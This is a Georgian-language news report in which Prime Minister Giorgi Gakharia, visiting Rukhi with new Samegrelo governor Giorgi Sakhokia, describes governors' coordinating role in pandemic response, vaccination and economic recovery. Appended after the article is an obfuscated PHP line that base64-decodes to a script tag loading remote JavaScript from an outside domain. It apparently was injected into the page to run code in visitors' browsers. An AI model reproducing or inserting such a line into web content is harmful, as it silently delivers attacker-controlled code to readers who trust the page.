celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრ გიორგი გახარიას განცხადებით, ადგილობრივ ხელისუფლებას და მთავრობას შორის ეფექტური კოორდინაციისთვის გუბერნატორების როლი ძალიან მნიშვნელოვანია.
 
განცხადება პრემიერმა სამეგრელოში, რუხში გააკეთა, სადაც სამეგრელოს ახლადდანიშნულ გუბერნატორ გიორგი სახოკიასთან ერთად ჩავიდა. პრემიერის თქმით, ახალ გუბერნატორს განსაკუთრებული წარდგენა არ სჭირდება, რადგან ის ისედაც მოვალეობას ასრულებდა და ყველა იცნობს.
 
„უაღრესად მნიშვნელოვანია გუბერნატორების ფუნქცია კოორდინაციის მიმართულებით ადგილობრივ ხელისუფლებასა და მთავრობას შორის. მათ ეფექტურ მუშაობაზე იქნება დამოკიდებული ბევრი პროექტის განხორციელება რეგიონში. მოგეხსენებათ, ჩვენ ახლა საკმაოდ სერიოზული გამოწვევების წინაშე ვართ, გლობალურ პანდემიას ვებრძვით, ვაქცინაციის ეტაპს დავიწყებთ უახლოეს პერიოდში და ამაში ადგილობრივი თვიმმართველობის როლი ძალიან მნიშვნელოვანია. გუბერნატორები უნდა იყვნენ პროცესში ჩართული. ეკონომიკური აღდგენის პერიოდისთვისაც ვემზადებით“, - განაცხადა პრემიერმა.
 
ამ კონტექსტში მან რეგიონებში, საშუალო ბიზნესის ხელშეწყობის მნიშვნელობას გაუსვა ხაზი და თქვა, რომ საშუალო ბიზნესი რეგიონში სწორად და მიზნობრივად უნდა იყოს მხარდაჭერილი.
 
„ეს იქნება ჩვენი ეკონომიკური აღდგენის გეგმის ძირითადი კომპონენტი და ამ გეგმის განხორციელებაში გუბერნატორებს ექნებათ დიდი მნიშვნელობა. ეფექტიანი და ეფექტური კოორდინაცია მთავრობას და ადგილობრივ ხელისუფლებას შორის - ეს არის სახელმწიფო რწმუნებულების რგოლი, რომელიც უნდა შეასრულონ. დარწმუნებული ვარ, ყველანი ერთად ამ პრობლემას მოაგვარებენ“, - განაცხადა პრემიერმა.
1442
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");